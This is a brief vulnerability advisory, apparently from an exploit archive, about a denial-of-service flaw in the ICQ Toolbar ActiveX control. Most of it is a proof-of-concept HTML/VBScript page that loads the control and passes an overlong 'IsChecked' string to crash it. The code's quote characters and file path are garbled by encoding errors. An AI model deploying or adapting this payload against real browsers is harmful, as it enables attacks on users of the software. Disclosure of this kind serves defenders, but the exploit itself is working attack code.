‘ICQ Toolbar IsChecked Denial of Service’

Summary

A vulnerability in ICQ Toolbar allows remote attackers to cause the control to crash by providing it with an arbitrarily long IsChecked value.’

Credit:

‘The information has been provided by Nir Goldshlager.
The original article can be found at: goldshlager19@gmail.com


Details

Exploit:
<html>
Test Exploit page
<object classid=&apsclsid:855F3B16-6D32-4FE6-8A56-BBB695989046&aps id=&apstarget&aps ></object>
<script language=&apsvbscript&aps>

&apsWscript.echo typename(target)

&apsfor debugging/custom prolog
targetFile = ‘D:Program FilesICQToolbartoolbaru.dll’
prototype = ‘Function IsChecked ( ByVal url As String ) As Long’
memberName = ‘IsChecked’
progid = ‘SoftomateLib.SoftomateObj’
argCount = 1

arg1=String(2068, ‘A’)

target.IsChecked arg1

</script>’

Categories: Exploits